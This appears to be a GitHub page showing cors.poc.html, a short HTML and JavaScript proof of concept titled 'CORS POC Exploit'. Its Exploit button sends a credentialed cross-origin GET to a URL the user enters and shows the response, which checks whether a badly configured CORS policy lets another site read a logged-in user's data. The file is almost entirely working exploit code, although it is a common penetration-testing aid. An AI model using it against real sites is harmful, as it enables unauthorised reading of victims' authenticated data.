-
Notifications
You must be signed in to change notification settings - Fork 1
/
cors.poc.html
60 lines (52 loc) · 1.54 KB
/
cors.poc.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<!DOCTYPE html>
<html>
<style>
code {
display: block;
font-family: monospace;
white-space: pre;
margin: 1em 0;
text-align: left;
}
</style>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Target url <input type="text" size="100" id="url"></h3>
<div id="input">
<button type="button" onclick="cors_req()">Exploit</button>
</div>
<br>
<div id="response">
</div>
<div id="results">
</div>
<script>
function safe_tags(str) {
return str.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>') ;
}
var response = "";
function cors_req() {
var url = document.getElementById("url").value;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
document.getElementById("response").innerHTML = "HTTP Response: "+this.status;
if (this.readyState == 4 && this.status == 200) { //
var jsonPretty = this.responseText;
try {
jsonPretty = JSON.stringify(JSON.parse(this.responseText),null,2);
} catch(err) {
document.getElementById("response").innerHTML = document.getElementById("response").innerHTML + " : not json response";
}
document.getElementById("results").innerHTML = "<pre width='50%' height='50%'><code>"+safe_tags(jsonPretty)+"</code></pre>";
} //else (this.readyState == 4 && this.status != 200) {
//document.getElementById("results").innerHTML = "<pre width='50%' height='50%'><code>"+safe_tags(this.responseText)+"</code></pre>";
//}
};
xhttp.open("GET", url, true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>